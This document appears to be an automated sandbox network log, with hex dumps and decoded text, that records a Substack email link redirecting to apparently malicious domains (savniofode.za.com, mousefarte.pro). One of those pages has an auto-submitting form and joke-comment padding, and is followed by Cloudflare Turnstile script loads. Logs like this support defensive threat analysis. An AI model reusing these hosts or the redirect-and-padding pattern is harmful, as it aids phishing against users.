                                                                                        set-cookie: AWSALBTG=RBZ4j2FfMpWJJMoWXmLNqd8vyZXMCwLCPGsG+sA3bs7KD52qXulJVyw6CSKlgrZg2uXkvCWlx6vPw/Z1TNTZ654y7KmuBTkomU/tuTi162G0DJ0dZDg8A6pF17FTfpTVDR+nX1ipOqwYHgaaW7E8Rnd6bk1M5pdgP5kn9OMP/ga8; Expires=Wed, 09 Oct 2024 15:15:11 GMT; Path=/
                                                                                        set-cookie: AWSALBTGCORS=RBZ4j2FfMpWJJMoWXmLNqd8vyZXMCwLCPGsG+sA3bs7KD52qXulJVyw6CSKlgrZg2uXkvCWlx6vPw/Z1TNTZ654y7KmuBTkomU/tuTi162G0DJ0dZDg8A6pF17FTfpTVDR+nX1ipOqwYHgaaW7E8Rnd6bk1M5pdgP5kn9OMP/ga8; Expires=Wed, 09 Oct 2024 15:15:11 GMT; Path=/; SameSite=None; Secure
                                                                                        set-cookie: cookie_storage_key=b5803762-c6bd-4d11-a3af-9cefbb4edf62; Max-Age=7776000; Domain=link.sbstck.com; Path=/; Expires=Tue, 31 Dec 2024 15:15:11 GMT; Secure; SameSite=None
                                                                                        set-cookie: ajs_anonymous_id=%22db661939-cc3d-46b6-b4e1-fae11a4917f4%22; Max-Age=31536000; Domain=link.sbstck.com; Path=/; Expires=Thu, 02 Oct 2025 15:15:11 GMT; SameSite=Strict
                                                                                        set-cookie: visit_id=%7B%22id%22%3A%227805f54c-6ac5-4688-bd20-8d48d551b720%22%2C%22timestamp%22%3A%222024-10-02T15%3A15%3A11.208Z%22%7D; Max-Age=1800; Domain=link.sbstck.com; Path=/; Expires=Wed, 02 Oct 2024 15:45:11 GMT; HttpOnly; SameSite=Strict
                                                                                        2024-10-02 15:15:11 UTC915INData Raw: 73 65 74 2d 63 6f 6f 6b 69 65 3a 20 61 62 5f 74 65 73 74 69 6e 67 5f 69 64 3d 25 32 32 6f 72 2d 62 62 65 31 39 31 39 64 2d 36 33 65 38 2d 34 63 34 35 2d 61 35 62 33 2d 64 38 35 30 62 39 61 66 63 65 65 37 25 32 32 3b 20 4d 61 78 2d 41 67 65 3d 33 31 35 33 36 30 30 30 3b 20 44 6f 6d 61 69 6e 3d 6c 69 6e 6b 2e 73 62 73 74 63 6b 2e 63 6f 6d 3b 20 50 61 74 68 3d 2f 3b 20 45 78 70 69 72 65 73 3d 54 68 75 2c 20 30 32 20 4f 63 74 20 32 30 32 35 20 31 35 3a 31 35 3a 31 31 20 47 4d 54 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4c 61 78 0d 0a 78 2d 70 6f 77 65 72 65 64 2d 62 79 3a 20 45 78 70 72 65 73 73 0d 0a 78 2d 73 65 72 76 65 64 2d 62 79 3a 20 53 75 62 73 74 61 63 6b 0d 0a 78 2d 63 6c 75 73 74 65 72 3a 20 73 75 62 73
                                                                                        Data Ascii: set-cookie: ab_testing_id=%22or-bbe1919d-63e8-4c45-a5b3-d850b9afcee7%22; Max-Age=31536000; Domain=link.sbstck.com; Path=/; Expires=Thu, 02 Oct 2025 15:15:11 GMT; HttpOnly; Secure; SameSite=Laxx-powered-by: Expressx-served-by: Substackx-cluster: subs
                                                                                        2024-10-02 15:15:11 UTC353INData Raw: 31 35 61 0d 0a 3c 68 65 61 64 3e 3c 6e 6f 73 63 72 69 70 74 3e 3c 4d 45 54 41 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 55 52 4c 3d 68 74 74 70 3a 2f 2f 73 61 76 6e 69 6f 66 6f 64 65 2e 7a 61 2e 63 6f 6d 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 73 75 62 73 74 61 63 6b 26 23 33 38 3b 75 74 6d 5f 6d 65 64 69 75 6d 3d 65 6d 61 69 6c 22 3e 3c 2f 6e 6f 73 63 72 69 70 74 3e 3c 74 69 74 6c 65 3e 68 74 74 70 3a 2f 2f 73 61 76 6e 69 6f 66 6f 64 65 2e 7a 61 2e 63 6f 6d 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 73 75 62 73 74 61 63 6b 26 23 33 38 3b 75 74 6d 5f 6d 65 64 69 75 6d 3d 65 6d 61 69 6c 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 70 65 6e 65 72 20 3d 20 6e
                                                                                        Data Ascii: 15a<head><noscript><META http-equiv="refresh" content="0;URL=http://savniofode.za.com/?utm_source=substack&#38;utm_medium=email"></noscript><title>http://savniofode.za.com/?utm_source=substack&#38;utm_medium=email</title></head><script>window.opener = n
                                                                                        2024-10-02 15:15:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1192.168.2.449741184.28.90.27443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-02 15:15:13 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept: */*
                                                                                        Accept-Encoding: identity
                                                                                        User-Agent: Microsoft BITS/7.8
                                                                                        Host: fs.microsoft.com
                                                                                        2024-10-02 15:15:13 UTC466INHTTP/1.1 200 OK
                                                                                        Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                        Content-Type: application/octet-stream
                                                                                        ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                        Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                        Server: ECAcc (lpl/EF06)
                                                                                        X-CID: 11
                                                                                        X-Ms-ApiVersion: Distribute 1.2
                                                                                        X-Ms-Region: prod-neu-z1
                                                                                        Cache-Control: public, max-age=91837
                                                                                        Date: Wed, 02 Oct 2024 15:15:13 GMT
                                                                                        Connection: close
                                                                                        X-CID: 2


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        2192.168.2.449744184.28.90.27443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-02 15:15:14 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept: */*
                                                                                        Accept-Encoding: identity
                                                                                        If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                                                        Range: bytes=0-2147483646
                                                                                        User-Agent: Microsoft BITS/7.8
                                                                                        Host: fs.microsoft.com
                                                                                        2024-10-02 15:15:14 UTC514INHTTP/1.1 200 OK
                                                                                        ApiVersion: Distribute 1.1
                                                                                        Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                        Content-Type: application/octet-stream
                                                                                        ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                        Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                        Server: ECAcc (lpl/EF06)
                                                                                        X-CID: 11
                                                                                        X-Ms-ApiVersion: Distribute 1.2
                                                                                        X-Ms-Region: prod-weu-z1
                                                                                        Cache-Control: public, max-age=91780
                                                                                        Date: Wed, 02 Oct 2024 15:15:14 GMT
                                                                                        Content-Length: 55
                                                                                        Connection: close
                                                                                        X-CID: 2
                                                                                        2024-10-02 15:15:14 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                                                        Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        3192.168.2.449745188.114.96.34433592C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-02 15:15:14 UTC686OUTGET /4pAtm/?utm_source=substack&utm_medium=email HTTP/1.1
                                                                                        Host: mousefarte.pro
                                                                                        Connection: keep-alive
                                                                                        Upgrade-Insecure-Requests: 1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                        Sec-Fetch-Site: cross-site
                                                                                        Sec-Fetch-Mode: navigate
                                                                                        Sec-Fetch-Dest: document
                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                        sec-ch-ua-mobile: ?0
                                                                                        sec-ch-ua-platform: "Windows"
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2024-10-02 15:15:15 UTC838INHTTP/1.1 200 OK
                                                                                        Date: Wed, 02 Oct 2024 15:15:15 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        x-powered-by: PHP/7.3.33
                                                                                        access-control-allow-origin: *
                                                                                        set-cookie: PHPSESSID=v6pg430j5lmu808i368bg8caoa; path=/
                                                                                        expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                        cache-control: no-store, no-cache, must-revalidate
                                                                                        pragma: no-cache
                                                                                        vary: Accept-Encoding
                                                                                        CF-Cache-Status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VAvlMN91t4roHU9gflE8FPw4kVNBSVP3tFJyQYx44Hoogfbwk%2Fwi%2F8kPt6pHyiDKSWTekuhceiTJsZxPXWPcvqC7XJequ3YnZ8fVrKvwxFJYeJltSq%2F6tR62PFrX9QxTSQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Speculation-Rules: "/cdn-cgi/speculation"
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8cc5a592b91a183d-EWR
                                                                                        2024-10-02 15:15:15 UTC531INData Raw: 38 35 39 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e e2 81 a4 3c 2f 74 69 74 6c 65 3e 0a 09 3c 21 2d 2d 20 3c 73 70 61 6e 3e 57 68 65 6e 20 61 20 6d 61 6e 20 6f 70 65 6e 73 20 61 20 63 61 72 20 64 6f 6f 72 20 66 6f 72 20 68 69 73 20 77 69 66 65 2c 20 69 74 e2 80 99 73 20 65 69 74 68 65 72 20 61 20 6e 65 77 20 63 61 72 20 6f 72 20 61 20 6e 65 77 20 77 69 66 65 3a 20 47 65 73 74 75 72 65 73 20 63 61 6e 20 73 70 65 61 6b 20 76 6f 6c 75 6d 65 73 2e 3c 2f 73 70 61 6e 3e 20 2d 2d 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a
                                                                                        Data Ascii: 859<html lang="en"><head><title></title>... <span>When a man opens a car door for his wife, its either a new car or a new wife: Gestures can speak volumes.</span> --><meta charset="UTF-8"><meta name="robots" content="noindex, nofollow">
                                                                                        2024-10-02 15:15:15 UTC1369INData Raw: 63 6f 6e 74 61 69 6e 65 72 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 35 30 70 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 7d 2e 63 65 6e 74 65 72 65 64 2d 63 6f 6e 74 65 6e 74 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 6d 61 78 2d 77 69 64 74 68 3a 35 30 30 70 78 7d 2e 66 73 2d 35 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 35 72 65 6d 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 2e 6d 74 2d 32 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2e 35 72 65 6d 7d 2e 6d 74 2d 35 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 33 72 65 6d 7d 2e 74 65 78 74 2d 6d 75 74 65 64 7b 63 6f 6c 6f 72 3a 23 36 63 37 35 37 64 7d 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 09 3c 21 2d 2d 20 75 6e
                                                                                        Data Ascii: container{margin-top:50px;display:flex;justify-content:center}.centered-content{text-align:center;max-width:500px}.fs-5{font-size:1.25rem;display:block}.mt-2{margin-top:.5rem}.mt-5{margin-top:3rem}.text-muted{color:#6c757d}</style></head><body>... un
                                                                                        2024-10-02 15:15:15 UTC244INData Raw: 20 79 6f 75 20 69 73 20 61 20 6d 61 6e 69 61 63 3a 20 44 72 69 76 69 6e 67 20 6f 70 69 6e 69 6f 6e 73 20 61 72 65 20 61 6c 77 61 79 73 20 72 65 6c 61 74 69 76 65 2e 3c 2f 70 3e 20 2d 2d 3e 0a 09 3c 73 63 72 69 70 74 3e 66 75 6e 63 74 69 6f 6e 20 64 61 72 69 6e 67 6c 79 28 29 20 7b 64 6f 63 75 6d 65 6e 74 2e 66 6f 72 6d 73 5b 30 5d 2e 73 75 62 6d 69 74 28 29 3b 7d 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 21 2d 2d 20 3c 73 70 61 6e 3e 48 61 76 65 20 79 6f 75 20 65 76 65 72 20 6e 6f 74 69 63 65 64 20 74 68 61 74 20 61 6e 79 62 6f 64 79 20 64 72 69 76 69 6e 67 20 73 6c 6f 77 65 72 20 74 68 61 6e 20 79 6f 75 20 69 73 20 61 6e 20 69 64 69 6f 74 2c 3c 2f 73 70 61 6e 3e 20 2d 2d 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: you is a maniac: Driving opinions are always relative.</p> --><script>function daringly() {document.forms[0].submit();}</script>... <span>Have you ever noticed that anybody driving slower than you is an idiot,</span> --></body></html>
                                                                                        2024-10-02 15:15:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        4192.168.2.449746104.18.95.414433592C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-02 15:15:15 UTC542OUTGET /turnstile/v0/api.js HTTP/1.1
                                                                                        Host: challenges.cloudflare.com
                                                                                        Connection: keep-alive
                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                        sec-ch-ua-mobile: ?0
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        sec-ch-ua-platform: "Windows"
                                                                                        Accept: */*
                                                                                        Sec-Fetch-Site: cross-site
                                                                                        Sec-Fetch-Mode: no-cors
                                                                                        Sec-Fetch-Dest: script
                                                                                        Referer: https://mousefarte.pro/
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2024-10-02 15:15:16 UTC356INHTTP/1.1 302 Found
                                                                                        Date: Wed, 02 Oct 2024 15:15:16 GMT
                                                                                        Content-Length: 0
                                                                                        Connection: close
                                                                                        access-control-allow-origin: *
                                                                                        cache-control: max-age=300, stale-if-error=10800, stale-while-revalidate=300, public
                                                                                        cross-origin-resource-policy: cross-origin
                                                                                        location: /turnstile/v0/g/ec4b873d446c/api.js
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8cc5a598cc3b43ac-EWR


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        5192.168.2.449747104.18.95.414433592C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-02 15:15:16 UTC557OUTGET /turnstile/v0/g/ec4b873d446c/api.js HTTP/1.1
                                                                                        Host: challenges.cloudflare.com
                                                                                        Connection: keep-alive
                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                        sec-ch-ua-mobile: ?0
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        sec-ch-ua-platform: "Windows"
                                                                                        Accept: */*
                                                                                        Sec-Fetch-Site: cross-site
                                                                                        Sec-Fetch-Mode: no-cors
                                                                                        Sec-Fetch-Dest: script
                                                                                        Referer: https://mousefarte.pro/
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2024-10-02 15:15:17 UTC441INHTTP/1.1 200 OK
                                                                                        Date: Wed, 02 Oct 2024 15:15:17 GMT
                                                                                        Content-Type: application/javascript; charset=UTF-8
                                                                                        Content-Length: 47262
                                                                                        Connection: close
                                                                                        accept-ranges: bytes
                                                                                        last-modified: Tue, 17 Sep 2024 16:06:37 GMT
                                                                                        cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                                                        access-control-allow-origin: *
                                                                                        cross-origin-resource-policy: cross-origin
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8cc5a59f5a6619cb-EWR
                                                                                        2024-10-02 15:15:17 UTC928INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 56 74 28 65 2c 72 2c 61 2c 6f 2c 63 2c 6c 2c 67 29 7b 74 72 79 7b 76 61 72 20 66 3d 65 5b 6c 5d 28 67 29 2c 70 3d 66 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 73 29 7b 61 28 73 29 3b 72 65 74 75 72 6e 7d 66 2e 64 6f 6e 65 3f 72 28 70 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 70 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 57 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 61 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 6c 3d 65 2e 61 70 70 6c 79 28 72 2c 61 29 3b 66 75 6e 63 74
                                                                                        Data Ascii: "use strict";(function(){function Vt(e,r,a,o,c,l,g){try{var f=e[l](g),p=f.value}catch(s){a(s);return}f.done?r(p):Promise.resolve(p).then(o,c)}function Wt(e){return function(){var r=this,a=arguments;return new Promise(function(o,c){var l=e.apply(r,a);funct
                                                                                        2024-10-02 15:15:17 UTC1369INData Raw: 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 61 2e 70 75 73 68 2e 61 70 70 6c 79 28 61 2c 6f 29 7d 72 65 74 75 72 6e 20 61 7d 66 75 6e 63 74 69 6f 6e 20 74 74 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75 6c 6c 3f 72 3a 7b 7d 2c 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44
                                                                                        Data Ascii: ct.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),a.push.apply(a,o)}return a}function tt(e,r){return r=r!=null?r:{},Object.getOwnPropertyD
                                                                                        2024-10-02 15:15:17 UTC1369INData Raw: 66 75 6e 63 74 69 6f 6e 20 41 65 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 48 74 28 65 29 7c 7c 42 74 28 65 2c 72 29 7c 7c 71 74 28 65 2c 72 29 7c 7c 6a 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 50 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 44 65 28 65 2c 72 29 7b 76 61 72 20 61 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 6c 5b 30 5d 26 31 29 74 68 72 6f 77 20 6c 5b 31 5d 3b 72 65 74 75 72 6e 20 6c 5b 31 5d 7d 2c 74 72
                                                                                        Data Ascii: function Ae(e,r){return Ht(e)||Bt(e,r)||qt(e,r)||jt()}function P(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function De(e,r){var a={label:0,sent:function(){if(l[0]&1)throw l[1];return l[1]},tr
                                                                                        2024-10-02 15:15:17 UTC1369INData Raw: 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 47 74 3d 33 30 30 30 32 30 3b 76 61 72 20 50 65 3d 33 30 30 30 33 30 3b 76 61 72 20 55 65 3d 33 30 30 30 33 31 3b 76 61 72 20 71 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4d 41 4e 41 47 45 44 3d 22 6d 61 6e 61 67 65 64 22 2c
                                                                                        Data Ascii: oaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Gt=300020;var Pe=300030;var Ue=300031;var q;(function(e){e.MANAGED="managed",
                                                                                        2024-10-02 15:15:17 UTC1369INData Raw: 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 69 65 7c 7c 28 69 65 3d 7b 7d 29 29 3b 76 61 72 20 58 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 4c 57 41 59 53 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 4e 54 45 52 41 43 54 49 4f 4e 5f 4f 4e 4c 59 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 58 7c 7c 28 58 3d 7b 7d 29 29 3b 76 61 72 20 70 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 52 45 4e 44 45 52 3d 22 72 65 6e 64 65 72 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 7d 29 28 70 65 7c 7c 28 70 65 3d 7b 7d 29 29 3b 76 61 72 20 6f 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 7d 29
                                                                                        Data Ascii: al",e.AUTO="auto"})(ie||(ie={}));var X;(function(e){e.ALWAYS="always",e.EXECUTE="execute",e.INTERACTION_ONLY="interaction-only"})(X||(X={}));var pe;(function(e){e.RENDER="render",e.EXECUTE="execute"})(pe||(pe={}));var oe;(function(e){e.EXECUTE="execute"})
                                                                                        2024-10-02 15:15:17 UTC1369INData Raw: 61 72 63 68 50 61 72 61 6d 73 3b 69 66 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 26 26 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 21 3d 3d 22 64 65 66 61 75 6c 74 22 26 26 72 2e 73 65 74 28 22 6f 66 66 6c 61 62 65 6c 22 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 29 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 63 6c 65 61 72 61 6e 63 65 5f 6c 65 76 65 6c 21 3d 3d 22 64 65 66 61 75 6c 74 22 26 26 72 2e 73 65 74 28 22 63 6c 65 61 72 61 6e 63 65 5f 6c 65 76 65 6c 22 2c 65 2e 70 61 72 61 6d 73 2e
                                                                                        Data Ascii: archParams;if(e.params._debugSitekeyOverrides&&(e.params._debugSitekeyOverrides.offlabel!=="default"&&r.set("offlabel",e.params._debugSitekeyOverrides.offlabel),e.params._debugSitekeyOverrides.clearance_level!=="default"&&r.set("clearance_level",e.params.
                                                                                        2024-10-02 15:15:17 UTC1369INData Raw: 3d 3d 3d 53 65 2e 46 41 49 4c 55 52 45 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 2c 6c 2c 67 3d 4c 28 43 72 2c 28 6c 3d 28 72 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 72 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64 20 30 3a 72 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 21 3d 3d 6e 75 6c 6c 26 26 6c 21 3d 3d 76 6f 69 64 20 30 3f 6c 3a 22 6e 6f 6e 65 78 69 73 74 65 6e 74 22 29 2c 66 2c 70 3d 4c 28 4e 72 2c 28 66 3d 28 61 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 61 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64 20 30 3a 61 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 21 3d 3d 6e 75 6c 6c 26 26 66 21 3d 3d 76 6f 69 64 20 30 3f 66 3a 22 6e 6f 6e 65 78 69 73 74 65 6e 74 22 29
                                                                                        Data Ascii: ===Se.FAILURE_HAVING_TROUBLES,l,g=L(Cr,(l=(r=e.displayLanguage)===null||r===void 0?void 0:r.toLowerCase())!==null&&l!==void 0?l:"nonexistent"),f,p=L(Nr,(f=(a=e.displayLanguage)===null||a===void 0?void 0:a.toLowerCase())!==null&&f!==void 0?f:"nonexistent")
